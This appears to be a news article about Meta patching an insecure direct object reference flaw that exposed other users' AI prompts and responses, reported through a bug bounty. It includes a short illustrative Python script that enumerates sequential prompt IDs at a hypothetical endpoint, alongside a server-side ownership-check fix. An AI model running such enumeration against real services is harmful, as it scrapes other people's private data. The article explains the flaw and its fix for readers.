Meta Patches Vulnerability That Could Have Leaked Users' AI Prompts and Generated Content

2025-07-16

Meta has resolved a critical security flaw that allowed users of its AI chatbot to access private prompts and AI-generated responses belonging to other users.

Speaking exclusively to TechCrunch, AppSecure founder Sandeep Hodkasia revealed that Meta paid him a $10,000 bug bounty for privately disclosing the vulnerability on December 26, 2024. Hodkasia said Meta deployed a fix on January 24, 2025, and that the company detected no evidence of malicious exploitation.

Hodkasia discovered the vulnerability while examining Meta AI's prompt-editing feature. He found that when a user edits a prompt, Meta's servers assign a unique identifier to both the prompt and its AI-generated response. By inspecting his browser's network traffic while editing a prompt, he demonstrated that changing this identifier caused the servers to return prompts and responses belonging to other users.
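This class of flaw is commonly known as an insecure direct object reference (IDOR). As a rough illustration only, an attack against such an endpoint might look like the sketch below; the URL, parameter names, and ID values are hypothetical, since the details of Meta's API were not disclosed.

```python
import requests

# Hypothetical endpoint and ID range -- Meta's actual API details were
# not disclosed. This only illustrates the general IDOR pattern.
API_URL = "https://ai.example.com/api/prompts"

session = requests.Session()
# The attacker authenticates normally with their own account.
session.cookies.set("session_token", "attacker-own-valid-token")

# Suppose the attacker's own prompt was assigned ID 1000052. If IDs are
# sequential and the server never checks ownership, neighboring IDs
# resolve to other users' prompts and AI responses.
for prompt_id in range(1000000, 1000100):
    resp = session.get(f"{API_URL}/{prompt_id}")
    if resp.ok:
        data = resp.json()
        print(prompt_id, data.get("prompt"), data.get("response"))
```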

The root cause was an inadequate authorization check on Meta's back-end servers: they never verified that the requester actually owned the prompt and response associated with a given identifier. Hodkasia also noted that the identifiers were easily guessable, so an attacker could have automated the manipulation to scrape private user data at scale.
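The conventional fix for an IDOR is a server-side ownership check before any record is returned. A minimal sketch of such a check, using a hypothetical Flask handler and data model rather than anything from Meta's actual code, might look like this:

```python
from flask import Flask, abort, jsonify, session

app = Flask(__name__)
app.secret_key = "dev-only-secret"  # required for Flask sessions

# Hypothetical in-memory store standing in for the backend database.
PROMPTS = {
    1000052: {"owner_id": "user-a", "prompt": "...", "response": "..."},
}

@app.route("/api/prompts/<int:prompt_id>")
def get_prompt(prompt_id):
    record = PROMPTS.get(prompt_id)
    if record is None:
        abort(404)
    # The authorization check that was missing: a valid ID alone is not
    # enough; the record must belong to the logged-in user.
    if record["owner_id"] != session.get("user_id"):
        abort(403)
    return jsonify({"prompt": record["prompt"], "response": record["response"]})
```

Using random, unguessable identifiers would also raise the bar for enumeration, but the ownership check is the actual fix; obscure IDs alone are not an access control.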

Meta spokesperson Ryan Daniels confirmed to TechCrunch that the fix was deployed in January, adding that the company found no evidence of abuse and had rewarded the researcher.

This disclosure comes as major tech companies race to expand their AI offerings despite ongoing privacy and security challenges. Meta's standalone AI app, launched earlier this year to compete with ChatGPT, got off to a rocky start after some users inadvertently shared publicly what they believed were private conversations with the chatbot.